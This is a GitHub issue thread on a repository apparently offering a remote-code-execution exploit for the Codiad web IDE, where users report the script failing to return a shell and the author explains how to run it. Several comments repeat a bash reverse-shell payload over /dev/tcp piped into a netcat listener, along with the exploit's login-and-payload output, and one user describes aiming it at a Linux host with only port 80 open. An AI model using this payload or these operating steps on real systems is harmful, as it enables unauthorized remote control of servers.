search

WangYihang / Codiad-Remote-Code-Execute-Exploit

A simple exploit to execute system command on codiad
64 stars 31 forks source link

Payload Issue? {"status":"error","message":"No Results Returned"} #5

Closed gazcbm closed 6 years ago

gazcbm commented 6 years ago

Running the script and I get the following (with no reverse shell) .... [+] Please execute the following command on your vps: echo 'bash -c "bash -i >/dev/tcp/192.168.1.2/4445 0>&1 2>&1"' | nc -lnvp 4444 nc -lnvp 4445 [+] Please confirm that you have done the two command above [y/n] [Y/n] y [+] Starting... [+] Login Content : {"status":"success","data":{"username":"admin"}} [+] Login success! [+] Getting writeable path... [+] Path Content : {"status":"success","data":{"name":"test","path":"files"}} [+] Writeable Path : files [+] Sending payload... {"status":"error","message":"No Results Returned"} [+] Exploit finished! [+] Enjoy your reverse shell!

WangYihang commented 6 years ago

please provide more details

Sent from my iPhone

On Aug 11, 2018, at 5:35 AM, GAZCBM notifications@github.com wrote:

Running the script and I get the following (with no reverse shell) .... [+] Please execute the following command on your vps: echo 'bash -c "bash -i >/dev/tcp/192.168.1.2/4445 0>&1 2>&1"' | nc -lnvp 4444 nc -lnvp 4445 [+] Please confirm that you have done the two command above [y/n] [Y/n] y [+] Starting... [+] Login Content : {"status":"success","data":{"username":"admin"}} [+] Login success! [+] Getting writeable path... [+] Path Content : {"status":"success","data":{"name":"test","path":"files"}} [+] Writeable Path : files [+] Sending payload... {"status":"error","message":"No Results Returned"} [+] Exploit finished! [+] Enjoy your reverse shell!

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or mute the thread.

A3iodun commented 6 years ago

Hi Wang. I am also having a similar issue as gazcbm. The exploit is not returning shell for some reason. I tried it out on 2.53 and 2.84 both. I am exploiting a Linux system with a single open port, 80.

WangYihang commented 6 years ago

got it, I will check it out tonight. Thank you guys for reporting

On Sat, Aug 18, 2018 at 4:26 PM A3iodun notifications@github.com wrote:

Hi Wang. I am also having a similar issue as gazcbm. The exploit is not returning shell for some reason. I tried it out on 2.53 and 2.84 both. I am exploiting a Linux system with a single open port, 80.

— You are receiving this because you commented.

Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/5#issuecomment-414041463, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhGslg_yAgxyVfRXqNhH3G17QVhZzks5uR8-agaJpZM4V42EQ .

WangYihang commented 6 years ago

Have you followed the instructions: On Linux machine you should open two terminal and execute two commands

  1. echo 'evil command to pop up a reverse shell to port 5555' | nc -nlvp 4444
  2. nc -nvlp 5555 You will get shell on the second terminal

On Sat, Aug 18, 2018 at 9:14 PM 王一航 wangyihanger@gmail.com wrote:

got it, I will check it out tonight. Thank you guys for reporting

On Sat, Aug 18, 2018 at 4:26 PM A3iodun notifications@github.com wrote:

Hi Wang. I am also having a similar issue as gazcbm. The exploit is not returning shell for some reason. I tried it out on 2.53 and 2.84 both. I am exploiting a Linux system with a single open port, 80.

— You are receiving this because you commented.

Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/5#issuecomment-414041463, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhGslg_yAgxyVfRXqNhH3G17QVhZzks5uR8-agaJpZM4V42EQ .

WangYihang commented 6 years ago

Like this echo 'bash -c "bash -i >/dev/tcp/192.168.1.2/4445 0>&1 2>&1"' | nc -lnvp 4444 nc -lnvp 4445

On Sat, Aug 18, 2018 at 9:17 PM 王一航 wangyihanger@gmail.com wrote:

Have you followed the instructions: On Linux machine you should open two terminal and execute two commands

  1. echo 'evil command to pop up a reverse shell to port 5555' | nc -nlvp 4444
  2. nc -nvlp 5555 You will get shell on the second terminal

On Sat, Aug 18, 2018 at 9:14 PM 王一航 wangyihanger@gmail.com wrote:

got it, I will check it out tonight. Thank you guys for reporting

On Sat, Aug 18, 2018 at 4:26 PM A3iodun notifications@github.com wrote:

Hi Wang. I am also having a similar issue as gazcbm. The exploit is not returning shell for some reason. I tried it out on 2.53 and 2.84 both. I am exploiting a Linux system with a single open port, 80.

— You are receiving this because you commented.

Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/5#issuecomment-414041463, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhGslg_yAgxyVfRXqNhH3G17QVhZzks5uR8-agaJpZM4V42EQ .

WangYihang commented 6 years ago

@gazcbm @A3iodun I tested the exploit again, works fine, I made a screen record, you guys can just follow these two videos:

A3iodun commented 6 years ago

Works just fine now. Thank you.